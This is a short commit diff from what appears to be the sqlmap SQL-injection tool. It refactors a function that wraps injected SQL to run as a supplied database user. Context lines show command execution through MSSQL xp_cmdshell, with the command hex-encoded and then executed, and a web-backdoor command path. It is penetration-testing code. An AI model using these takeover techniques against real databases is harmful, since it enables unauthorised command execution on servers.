make the runAsDBMSUser() generic and ported to abstraction.py so the same function will be used for PostgreSQL dblink() too

2024-11-22 17:46:37 +03:00 · 2012-07-02 02:14:03 +01:00 · 2012-07-02 02:14:03 +01:00 · add8352804
commit add8352804
parent 6697927098
2 changed files with 17 additions and 17 deletions
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@ -16,6 +16,7 @@ from lib.core.data import logger
 from lib.core.enums import DBMS
 from lib.core.enums import PAYLOAD
 from lib.core.exception import sqlmapUnsupportedFeatureException
+from lib.core.settings import SQL_STATEMENTS
 from lib.core.shell import autoCompletion
 from lib.request import inject
 from lib.takeover.udf import UDF
@ -37,6 +38,21 @@ class Abstraction(Web, UDF, xp_cmdshell):
        Web.__init__(self)
        xp_cmdshell.__init__(self)

+    def runAsDBMSUser(self, query):
+        if conf.dCred:
+            for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
+                for sqlStatement in sqlStatements:
+                    if query.lower().startswith(sqlStatement):
+                        sqlType = sqlTitle
+                        break
+
+            if sqlType and "SELECT" not in sqlType:
+                query = "SELECT 1;%s" % query
+
+            query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
+
+        return query
+
    def execCmd(self, cmd, silent=False):
        if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
            self.webBackdoorRunCmd(cmd)
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@ -21,7 +21,6 @@ from lib.core.data import logger
 from lib.core.enums import DBMS
 from lib.core.enums import HASHDB_KEYS
 from lib.core.exception import sqlmapUnsupportedFeatureException
-from lib.core.settings import SQL_STATEMENTS
 from lib.core.threads import getCurrentThreadData
 from lib.core.unescaper import unescaper
 from lib.request import inject
@ -148,21 +147,6 @@ class xp_cmdshell:
        if cmd:
            self.xpCmdshellExecCmd(cmd)

-    def xpCmdshellForgeRunAs(self, query):
-        if conf.dCred:
-            for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
-                for sqlStatement in sqlStatements:
-                    if query.lower().startswith(sqlStatement):
-                        sqlType = sqlTitle
-                        break
-
-            if sqlType and "SELECT" not in sqlType:
-                query = "SELECT 1;%s" % query
-
-            query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
-
-        return query
-
    def xpCmdshellForgeCmd(self, cmd):
        self.__randStr = randomStr(lowercase=True)
        self.__cmd = "0x%s" % hexencode(cmd)
@ -170,7 +154,7 @@ class xp_cmdshell:
        self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
        self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)

-        return self.xpCmdshellForgeRunAs(self.__forgedCmd)
+        return self.runAsDBMSUser(self.__forgedCmd)

    def xpCmdshellExecCmd(self, cmd, silent=False):
        cmd = self.xpCmdshellForgeCmd(cmd)